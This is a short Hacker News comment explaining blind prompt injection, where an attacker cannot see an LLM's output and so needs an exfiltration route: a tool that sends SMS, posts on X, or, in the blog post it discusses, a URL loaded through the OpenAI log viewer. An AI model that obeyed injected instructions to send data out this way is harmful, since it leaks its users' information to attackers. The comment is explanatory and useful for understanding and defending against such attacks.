Hacker News new | ask | show | jobs
by charcircuit 151 days ago
The situation this applies to is when input from the attacker is fed to a LLM, but the response from that LLM is not returned to the attacker.

If an attacker tries a prompt injection they would be unable to see the response of the LLM. In order to complete an attack they need to find an alternate way to have information sent back to them. For example if the LLM had access to a tool to send an SMS message the prompt injection could say to message the attacker, or maybe it has a tool to post on X which an attacker could then see. In this blog post the way information gets back to the attacker is by having someone load a URL by by viewing the openai log viewer.